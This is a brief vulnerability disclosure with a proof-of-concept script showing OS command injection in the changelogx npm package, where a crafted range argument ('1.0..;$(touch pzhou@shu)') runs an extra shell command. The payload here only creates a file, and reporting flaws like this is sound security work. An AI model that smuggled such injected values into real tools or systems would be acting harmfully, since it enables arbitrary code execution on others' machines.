The git_helper.getCommits() function in changelogx package whose expects to execute git log command can be illegally injected arbitrary other OS commands by its $range arguments.
// PoC.sh
npm i changelogx -g
git clone https://github.com/royriojas/changelogx.git
cd changelogx
ls
#you cannot see pzhou@shu
changelogx -r '1.0..;$(touch pzhou@shu)' -o changelog.html
ls
#you can see pzhou@shu
This vulnerability is capable of executing arbrtary OS commands by changelogx.